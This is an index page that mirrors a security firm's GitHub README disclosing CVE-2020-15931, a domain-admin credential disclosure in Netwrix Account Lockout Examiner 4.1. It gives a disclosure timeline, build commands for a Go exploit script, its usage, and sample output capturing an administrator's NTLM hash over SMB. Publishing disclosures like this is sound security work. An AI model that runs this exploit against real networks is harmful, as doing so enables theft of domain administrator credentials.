Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/optiv/CVE-2020-15931
Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability
https://github.com/optiv/CVE-2020-15931
Last synced: 21 days ago
JSON representation
Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability
- Host: GitHub
- URL: https://github.com/optiv/CVE-2020-15931
- Owner: optiv
- License: mit
- Created: 2020-07-29T19:02:29.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-11-11T19:48:38.000Z (about 4 years ago)
- Last Synced: 2024-05-13T16:35:13.051Z (7 months ago)
- Language: Go
- Size: 137 KB
- Stars: 25
- Watchers: 9
- Forks: 6
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - optiv/CVE-2020-15931 - Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability (Go)
README
# CVE-2020-15931
#### Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability## Vulnerbility Overview
Netwrix Account Lockout Examiner (ALE) before 5.1 allows an unauthenticated, remote adversary to trigger a connection to an attacker-controlled system and capture the NTLMv1/v2 challenge-response of an account with domain administrator privileges. The domain administrator account would already be configured with the product as required for installation. An adversary can exploit this by generating a single Kerberos Pre-Authentication Failed (Event ID 4771) event on a domain controller.More details about the vulnerability can be found on the following [Blog](https://www.optiv.com/explore-optiv-insights/source-zero/netwrix-account-lockout-examiner-41-disclosure-vulnerability?utm_source=oth&?utm_medium=dig&?utm_content=blg?cid=prt:red-netwrix-lockout-examiner:thl:som:sze:int:Q3:2020::ALL)
![image](https://github.com/optiv/CVE-2020-15931/blob/master/netwrix_attack.png)
## Credits
The vulnerability was discovered in the wild by Robert Surace ([@robsauce](https://github.com/ROBSAUCE)) and Daniel Min ([@bigb0ss](https://github.com/bigb0sss)), Optiv Security Consultants while performing a security assessment. Upon identification of CVE-2020-15931, Optiv immediately contacted Netwrix to disclose the identified flaw responsibly.## Vulnerability Disclosure Timeline
* June 09, 2020 – Vulnerability discovered by Optiv
* June 15, 2020 – Disclosed by Optiv to vendor
* July 14, 2020 – Vendor acknowledged the issue and agreed to release the fixed version
* July 23, 2020 – Disclosed to CNA (MITRE Corporation)
* July 24, 2020 – Vendor released the fixed version of the Netwrix Account Lockout Examiner 5.1
* July 24, 2020 – CVE-2020-15931 assigned by CNA (MITRE Corporation)
* August 13, 2020 – Disclosed to the public
* October 30, 2020 - Base Score 7.5 High assigned by NVD (National Vulnerability Database)## Exploit Script
### Installation
The exploit script was developed in golang. Install the following dependencies:
```
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
```It also utilizes the smbserver.py from [Impacket](https://github.com/SecureAuthCorp/impacket).
```
pip install impacket
```Finally, download the exploit script and build it.
```
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
```### Usage
```
$ ./cve-2020-15931_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menuExample:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith```
### Exploit
(Note: At the time of writing, this attack can only be identified via a blind-based attack. This is because it is difficult
to determine if the target organization is using Netwrix Account Lockout Examiner on their network to audit account authentications or not.)
```
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
```
## References
[Netwrix Account Lockout Examiner 5.1](https://www.netwrix.com/account_lockout_examiner.html)
[Event ID 4771](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771)
[Impacket smbserver.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbserver.py)
[Gokrb5 Client](https://github.com/ropnop/gokrb5)
[CVE-2020-15931](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15931)